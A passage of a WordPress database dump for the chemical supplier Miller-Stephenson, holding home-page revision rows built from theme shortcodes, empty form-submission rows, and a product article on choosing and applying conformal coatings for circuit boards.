link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:42:25', '2017-05-02 19:42:25', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4154, 2, '2017-05-02 19:42:45', '2017-05-02 19:42:45', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-02 19:42:45', '2017-05-02 19:42:45', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4155, 0, '2017-05-03 10:01:51', '2017-05-03 10:01:51', '', '', '', 'publish', 'closed', 'closed', '', '4155', '', '', '2017-05-03 10:01:51', '2017-05-03 10:01:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4155/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4156, 2, '2017-05-03 14:44:35', '2017-05-03 14:44:35', '<h3><strong>Conformal Coatings | Which Conformal Coatings are right for you?</strong></h3>\r\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\r\n<h4><strong>What are Conformal Coatings?</strong></h4>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h4><strong>Types of Conformal Coatings:</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish conformal coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h4><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h4>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2017-05-03 14:44:35', '2017-05-03 14:44:35', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4157, 2, '2017-05-03 14:57:24', '2017-05-03 14:57:24', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" bg_pos="-90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="26" scale="71" position_x="0" position_y="5"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="55" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-03 14:57:24', '2017-05-03 14:57:24', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4158, 2, '2017-05-03 14:58:06', '2017-05-03 14:58:06', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-03 14:58:06', '2017-05-03 14:58:06', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4159, 0, '2017-05-03 16:32:19', '2017-05-03 16:32:19', '', '', '', 'publish', 'closed', 'closed', '', '4159', '', '', '2017-05-03 16:32:19', '2017-05-03 16:32:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4159/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4160, 0, '2017-05-03 20:25:55', '2017-05-03 20:25:55', '', '', '', 'publish', 'closed', 'closed', '', '4160', '', '', '2017-05-03 20:25:55', '2017-05-03 20:25:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/4160/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4161, 0, '2017-05-04 05:14:09', '2017-05-04 05:14:09', '', '', '', 'publish', 'closed', 'closed', '', '4161', '', '', '2017-05-04 05:14:09', '2017-05-04 05:14:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/4161/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4162, 0, '2017-05-04 08:22:56', '2017-05-04 08:22:56', '', '', '', 'publish', 'closed', 'closed', '', '4162', '', '', '2017-05-04 08:22:57', '2017-05-04 08:22:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4162/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4163, 0, '2017-05-04 18:05:43', '2017-05-04 18:05:43', '', '', '', 'publish', 'closed', 'closed', '', '4163', '', '', '2017-05-04 18:05:43', '2017-05-04 18:05:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4163/', 0, 'nf_sub', '', 0); 
